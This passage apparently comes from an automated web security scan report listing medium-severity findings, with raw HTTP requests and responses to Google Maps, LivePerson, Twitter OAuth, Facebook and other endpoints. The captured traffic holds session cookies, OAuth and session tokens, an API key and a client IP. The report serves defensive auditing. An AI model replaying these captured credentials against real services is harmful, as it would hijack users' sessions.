gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Set-Cookie: OAM_REQ=VERSION_4~rHPhjRXD8QG6y%2fjCF%2bf%2fFZxcUX2CeXT0kcF2HTkMBOcLLkOvSuyr1Rb6BgvZDb5rg6a0rsA2Vmqdh11OVr%2frjPFoakHkP4kqM%2fW2ScpLBTkndAEAA2WYI1tIHWQwG%2fsbefHfB9laP%2bnXJPBzUJKEocy63IaWPJ2oqlrXAEvrcDDtOwHniU4Bbe4VWlOBMFw1HU9k0lg6UOcybg33ovXi3j6ZhQDLXzzwUjBER6phLEgEyzEUi%2fIKRtSXeGM6svDt1sR4af58MTwFuyK4at%2bWdZb0BeLph6HJdrvE4Yfy0gZidhK%2bAAd%2bHocmNdHX8qOgIQodQCgEMkBdKhvp75VXVh6M%2fROaMtkyRqOrbAc%2biSu%2f21%2fc8pcgcPejh4C7czA%2f6VftbwCC1aqncoN%2bYJU9AuerZJ4TJsokHbI%2bxX4MLOJ9w3lfYeBe0MXOfdf0AIfbN0cVYQCS%2f%2fDnLonKc6UHxtGv5%2fso45PWSJ8D9JG%2bNavv3ahdnklHFNbkwGPlrMWXn%2bI9%2fTdm9yHdlaUaUAxY6fm4g2WwbpPBLTHlHS0eF6MSWC9%2bF2X%2f52ogwelXUDNVB8Ae5bG1U%2f%2bYg0TQzN5v66C0Yd7XN%2fbfWPG3Cdiys%2fVWXaZU%2fClAgHeeoSd6dk5Z98IKkjzpmCZjv%2bn48ijiSHAnXZAzwajzC7e8Eqtv48Zu2VESny4E9z90l%2ffqAxyMd1tlLCFe5ppuQhpfhyleb01FWZHx8DdhBMD9I7wwjJMCMFHOb5mrJdd6PphGh9c8FFSesutrMAsrZyc54qSVknzgoxqBZJB%2fsSPlptZKwj4OXGZxhXEp8y8Rm4Pckimkagl9cL4VS3PzSnqlJJbBlofFyLagB7IsSfMigwWIwPKB8Aw%2fXr1wb3xNGmx5uSkQ4pLNesPwiiSLzXUTlUgvtP9fHLZZNmo4yjJoOWOQigXmIesWpMjAHfrMTnbk30EISqJJWmlYK%2ftErfbfMwsmS0UPxinI6GtFJ4lo7E6LkqE7W71gXxH0NXBsoj2dy1ZC0Z01WE1KBm1NALFivG2PcVXmpwka2jrR60xtB3i5CNVuFAZHyBb9n24aMWZJ06bxr6Vpv2aEymBPGj3kS%2f6OVq4bNCMHKTQkVFH0W%2f3tF%2fMZ5BBkAKszgNeiujHqh4y2C8ZtzY0iV8JrjjMGhy3%2bT9lJKbYiPp99%2bctXkfISmUU3vfsbPq6omC%2bsuYo068a4q4deDf9sD5vfNLBVe0BnGVpwl5eX8j00WYtUcR18BtGtcj3DEqvezGNCdVfi68UR%2bvrAQ827BghHlilw0TzOvuvqMnt%2fsp5pK8CrD7WVaQw9pc8ds6uhB6ivvnXZP9DvyxBPh71Zu9dfTSy0SDviiwEVS4hKX8EFLy%2fVv1RtgLytG%2bYFgX60K%2byQwd%2fLe34eWdwVP4HcrSvzJYbckecreY3BSxFE943HLGDwOtl4ruhmA9SNoL%2b8bqR19n2VTVJgdhlDzQJ1X6pP9YoA3vywNypQWhr22dx1jE1U4gIDlwow6lpPKgwBLWA%2b3kMbndWD3WPoZ3ZIHhPpMXUg08smbH8Sdy3IaFRvG6bbaU5GcZkH%2f6Ow6JfzGn1UmFn1NggSbsG3c10P5UeHaNjGNjbpis%2bk0scc0yAEBEau3eDSNJYmBkU24neLUPANvyF59o1c6fYijn5MowQGcvJesm7H4NZ4SDEtcnIDllFKLp5ZaqaptPlSKzSJnWPAku6%2b9LYJ1UM0TVS1DLy2h7euLn4Vq1zlc9zziccHk%2fNnE12LWblXJSuay0cvprgwm0%2b9a1y2MNJVkQn%2f7Rj95Fn0AhkugaFeft5QJJ5LkKo4%2bQ873G9gTomi6XI6WO%2bw%2brNwUJyHiBQILq9c3daU3mlKo6km8d81vHwohyC0eR4WaAMqwIqkCbBnlhR6ZSegfE8Zyexls1oGiwKtwif1jfvhff9GwFci8wP8HhZEfoG6EaIx94z4p6KLbXp%2f60t2rxUch2%2fDbyfSxfOjTAQbk3h5ReIq2izOVtjAgHzG%2bpQtgaXpmtUWoAEXm30xSqtVivDKNJ6l6cj2BDzvQr4Qc2R7ibEYavShPpym%2fxYVNIsYDot1e6uABrIYmqUlAlvymA5agP5wjVyJJa6b61Mcry3uf%2fj9O8m16SS46JomgAOI7CpaWpGNbn3XdScM%2f4fAm4PxeC%2frE4g950Simk2vrTVukQqCndyj8%2fWo9IUE2TsXcB1BXafBKIUhfdX3NVy3mzxikpgMZgYhyuzX1pCBLxVQFqFS00ptuVyO%2fO50qOPARagZLCieJrQGp3cFN%2fT8L2vn%2fUfhnv94707MdrnCQtEqyooGRk%2fiuNGQnJ%2fh9BgS8kexVv3Oo5BwANDB3YnqqNYJtjx8wdii85X4BGuonRAhEanru9bBYBjfzVMCyKrgbGhImmVNg5fO42WxeW0FCV1uS33ICsGC0eIbG2pWqSeYFL8znPl1wTy7upc%2fmkshg0nZX1IIU8eLDab1nOW39%2fivWmUK%2f8Z3khcAyPF4ssLjlESGYV0Rec8zh44N14HNEkl1HV%2f1C3%2fsFAWat5q0batJwSvYZu%2f37cquKNz9ylNGnFlZT3G5dc9vMDrXEP6WoEKkZmDzV7j5B8eJ%2bzDjfYlroY8EwmagBDCr9Oc3cFtp3425w4SE5wuzqLJtb8beqRcZ9fNSDrB0iLlU9XJzsRUUHvZJ3ShLSR%2fumACB9gf0IkfakmZHLfufn2F9s2onFRG%2b4UfqkfK3dptld84hsptcZ%2bWuCB0pUsLWTW9dTSLmfspp%2fk60jwieLBfibvbC4195ntM%2bFliH5fdP2%2fO2BoXP4uQciAPvddz5O%2fq1mVjNuv%2ft8V8J3Gtr9xkZxJiH7MmyGfZ3N4ySXv3f1L3GGK9Bm0UNbz0nxuT8wDY6J%2fp1nPja6a1jNsoLpVZeN3VpiT6xdbD6ntPfiCKLEJQrSaOO%2fKzaorqdq0E5pElr4OQTE3%2b4jmgVigvPGlFRd7F52RSOaXFsR0W%2bswawVxLqDNv7C6NueZkh8wOqbqvvUez1oz6Dcqa3qJnsl3HrvPedfbqkCZIcY5cTya1ES6DwdDpLpfD0SoTmD9IEcLBnFgiIIu2W%2blGphWB8f3Y0Vyvhhm3nuednaJO1rasC3EMp7IJV4N2L4TNbmgLK6i6jPfW7DQ1Hz7uSKToangEJMfIgYRcmHdLeq0%2b2jny3hqNXi%2f9Tp4ohijG1E%2fip%2fX%2bLAms3MQle%2frRDAoWFtgHQsjKaGxuEPl1i88XOWh528FAPHlF8O104qHdRM0ua%2bhay5U7ku6w6c4CWMcp0RcVK8vF2A%2bCCk0ExnkNsSXwo%2fsUjhJn9L3DX%2b3OWPsSVGI4OqNCg3x5WGHPPXrrgf8CDpRcD0PqYLo%2bwT7Qzu%2f8LnFJZdO1zK0s6kPsdO7uSZY0T1spJYutSMcFxIL%2bHHhhDWdPwOXwj1R9JV%2bd9U3LcVsbT07rAWYMQ6mC7lNvzyGBy7tRYULsxWi8UJpK%2facmmiaHSKILs1IjZZX1IYkTBtohUePcMmrV1t%2bcWDTkJloPjKjK9TdiVaLVyHMwDUVA0uftR48E4rrdGen6drbCBdq2NzOZjOv0tdPVSOiHjsQxG9%2f7Dn6AhR5x936i4nAEwbSCryzHT6R%2bJH4d9hOiBtezy6pp4bgYO; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000It^IrK66uHK6EVADUS1DIbuZ00C3GL
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/
Content-Length: 6016

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

5.56. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fplancast.com%2Fp%2F3zbp&callback=_xdc_._egtm84&token=58246 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 01 Mar 2011 14:12:30 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._egtm84 && _xdc_._egtm84( [1] )

5.57. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i239218&2i431566&2e1&3u12&4m2&1u745&2u302&5m3&1e0&2b1&5sen-US&token=14438 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 01 Mar 2011 13:46:43 GMT
Expires: Wed, 02 Mar 2011 13:46:43 GMT
Server: staticmap
Content-Length: 92331
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1540

.PNG
.
...IHDR...............|.....PLTE...    .......--.=1.---==!111===!I.1R)=^5MM)^^5nn=~b!IIIMMMVVV^^^VVzMjEZvR~~Efffnnnrrr~~~nn.f.bv.n.z).ZZ..M..~..V..^..f........9.....!..)..1..=..V..~..A..n..~
...[SNIP]...

5.58. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d30.13281806495917&2d-98.12672417749025&2m2&1d30.401467515304425&2d-97.35939782250978&2u12&4sen-US&5e0&callback=_xdc_._o5io5e&token=21953 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 01 Mar 2011 14:12:29 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3499

_xdc_._o5io5e && _xdc_._o5io5e( ["Map data ..2011 Google",[["obliques",[[30.37287518811803,-97.6904296875],[30.41078179084588,-97.646484375]]],["obliques",[[30.33495388198856,-97.822265625],[30.372875
...[SNIP]...

5.59. http://mt0.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt0.googleapis.com
Path:   /mapslt/ft

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cfalse%7Cos%3A1488714754&las=tuwvwtvutwvu,tuwvwtvutwvw,tuwvwtvutwwt,tuwvwtvutwwu,tuwvwtvutwwv,tuwvwtvutwww,tuwvwtvuvutu,tuwvwtvuvutw,tuwvwtvuvuut,tuwvwtvuvuuu,tuwvwtvuvuuv,tuwvwtvuvuuw&z=12&src=apiv3&xc=1&callback=_xdc_._iaf69n&token=94828 HTTP/1.1
Host: mt0.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 14:12:30 GMT
Expires: Tue, 01 Mar 2011 14:12:30 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 573

_xdc_._iaf69n && _xdc_._iaf69n([{id:"tuwvwtvutwvu",zrange:[12,12],layer:"m"},{id:"tuwvwtvutwvw",zrange:[12,12],layer:"m"},{id:"tuwvwtvutwwt",zrange:[12,12],layer:"m"},{id:"tuwvwtvutwwu",zrange:[12,12]
...[SNIP]...

5.60. http://server.iad.liveperson.net/hc/43040610/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hc/43040610/

Request

GET /hc/43040610/?&site=43040610&cmd=mTagStartPage&lpCallId=37284447812-532055535120&protV=20&lpjson=1&page=http%3A//www.networksolutions.com/domain-name-registration/RV8.jsp%3Fsiteid%3D8%26channelid%3DP13C8S570N0B9A1D661E0000V104%26promo%3DRV699SALE3%26referID%3Dns_google_domains_tp%26k%3Ddomain%28%29%7BPhone-RV%7D%26adid%3D5954407096%26plid%3D%26gclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%26clickid%3D1294340992&id=1720266903&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-Domain%20Sales&activePlugin=none&cobrowse=true&PV%21unit=Domain%20Sales&PV%21pageLoadTime=52%20sec&PV%21visitorActive=1&SV%21NSSessionID=7f54a2c886d230536bf4e8264959&SV%21RVTraffic=No&title=Domain%20Names%2C%20Web%20Hosting%20and%20Online%20Marketing%20Services%20%7C%20Network%20Solutions&cookie=JSESSIONID%3D7f54a2c886d230536bf4e8264959%3B%20JROUTE%3Dqevx%3B%20vrsnsf%3D7f54a2c886d230536bf4e8264959%3B%20landing%3DP13C8S570N0B9A1D661E0000V104%3B%20vertigo%3Dfalse%3B%20s_cc%3Dtrue%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utmz%3D82970249.1298824276.1.1.utmgclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%7Cutmccn%3D%28not%2520set%29%7Cutmcmd%3D%28not%2520set%29%3B%20__utmv%3D%3B%20__utma%3D82970249.1334409241.1298824276.1298824276.1298824276.1%3B%20__utmc%3D82970249%3B%20__utmb%3D82970249.1.10.1298824276%3B%20currency%3DUSD HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8822472582692139368; LivePersonID=LP i=44502044936234,d=1297806164; HumanClickACTIVE=1298824317353

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-44502044936234-1298824318:0; expires=Mon, 27-Feb-2012 16:31:58 GMT; path=/hc/43040610; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8822472582692139368; path=/hc/43040610
Set-Cookie: HumanClickSiteContainerID_43040610=STANDALONE; path=/hc/43040610
Set-Cookie: LivePersonID=-44502044936234-1298824318:-1:-1:-1:-1; expires=Mon, 27-Feb-2012 16:31:58 GMT; path=/hc/43040610; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 27 Feb 2011 16:31:58 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"37284447812-532055535120","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

5.61. http://stackauth.com/auth/global/read  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://stackauth.com
Path:   /auth/global/read

Request

GET /auth/global/read?request=SArtemKw4fnRyhM0oQxlJF7%2F%2B1Kt8W%2BWzFuFTmv4kL6R5ngQ%2FRi%2BUozcW0OL9xzh%2F3J7c%2B5h%2FOJcTMWkdy0z8hyfLekLeFZ5q4waBLe05T0%3D&nonce=WXxqTQAAAADQJ4NIYXSNJA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Referer: http://webapps.stackexchange.com/questions/11750/where-are-the-shrinkster-short-url-codes-now
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 16:31:35 GMT
Content-Length: 1287

<html><head>
<script type='text/javascript'>
var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"SArtemKw4fnRyhM0oQxlJF7/+1Kt8W+W
...[SNIP]...

5.62. http://telligent.com/analytics.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://telligent.com
Path:   /analytics.ashx

Request

GET /analytics.ashx?a=5&g=77&ip=173.193.214.243&requrl=%2fproducts%2ftelligent_community.aspx&session=560a102e-bd90-4a32-912f-ea337f9ef1cb&ts=634343330765421166&ua=Mozilla%2f5.0+(Windows%3b+U%3b+Windows+NT+6.1%3b+en-US)+AppleWebKit%2f534.13+(KHTML%2c+like+Gecko)+Chrome%2f9.0.597.98+Safari%2f534.13&uid=13b36763-58d5-4e2d-a664-810fee6b36c6& HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 0


5.63. https://twitter.com/oauth/authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://twitter.com
Path:   /oauth/authenticate

Request

GET /oauth/authenticate?oauth_token=RY9pXmKSYCHn4ZOq4lHvegoli01DxbPGl4swXkb0iQ HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://klout.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:57:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298948244-99085-34217
ETag: "61acb31485bfecfac0f4f92f3b8e6eb2"-gzip
Last-Modified: Tue, 01 Mar 2011 02:57:24 GMT
X-Runtime: 0.01301
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=il7XRY41jHkSWESiWNTCujy9Toi1xC1W; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWQ2NzQ3NGE5Y2YxM2ViMGVjYTJhYjhiZTRmMmQy%250AYWQ6DnJldHVybl90byJiaHR0cHM6Ly90d2l0dGVyLmNvbS9vYXV0aC9hdXRo%250AZW50aWNhdGU%252Fb2F1dGhfdG9rZW49Ulk5cFhtS1NZQ0huNFpPcTRsSHZlZ29s%250AaTAxRHhiUEdsNHN3WGtiMGlROg9jcmVhdGVkX2F0bCsII0VZby4BOgdpZCIl%250ANWYzNWNhOGI1OTJhM2JhZmU5YWQ5YjA2MTU5ODgwOGEiCmZsYXNoSUM6J0Fj%250AdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--e711b42fd4829d2613b878aeeaf6908dcd08e937; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta c
...[SNIP]...
</strong> would like to sign you in using your Twitter account. Not using Twitter? <a href="/account/new?oauth_token=RY9pXmKSYCHn4ZOq4lHvegoli01DxbPGl4swXkb0iQ">Sign up and Join the Conversation!</a>
...[SNIP]...

5.64. https://twitter.com/oauth/authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://twitter.com
Path:   /oauth/authenticate

Request

GET /oauth/authenticate?oauth_token=RY9pXmKSYCHn4ZOq4lHvegoli01DxbPGl4swXkb0iQ HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://klout.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:57:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298948244-99085-34217
ETag: "61acb31485bfecfac0f4f92f3b8e6eb2"-gzip
Last-Modified: Tue, 01 Mar 2011 02:57:24 GMT
X-Runtime: 0.01301
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=il7XRY41jHkSWESiWNTCujy9Toi1xC1W; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWQ2NzQ3NGE5Y2YxM2ViMGVjYTJhYjhiZTRmMmQy%250AYWQ6DnJldHVybl90byJiaHR0cHM6Ly90d2l0dGVyLmNvbS9vYXV0aC9hdXRo%250AZW50aWNhdGU%252Fb2F1dGhfdG9rZW49Ulk5cFhtS1NZQ0huNFpPcTRsSHZlZ29s%250AaTAxRHhiUEdsNHN3WGtiMGlROg9jcmVhdGVkX2F0bCsII0VZby4BOgdpZCIl%250ANWYzNWNhOGI1OTJhM2JhZmU5YWQ5YjA2MTU5ODgwOGEiCmZsYXNoSUM6J0Fj%250AdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--e711b42fd4829d2613b878aeeaf6908dcd08e937; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta c
...[SNIP]...

5.65. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request

GET /extern/login_status.php?api_key=81856ff6ac720a1e1e3e61e007b6228e&app_id=81856ff6ac720a1e1e3e61e007b6228e&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39e67115%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff37caceca%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df11292fe0c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df394a3d884%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff37caceca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11292fe0c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df290827b98%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff37caceca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11292fe0c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df349910f18%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff37caceca%2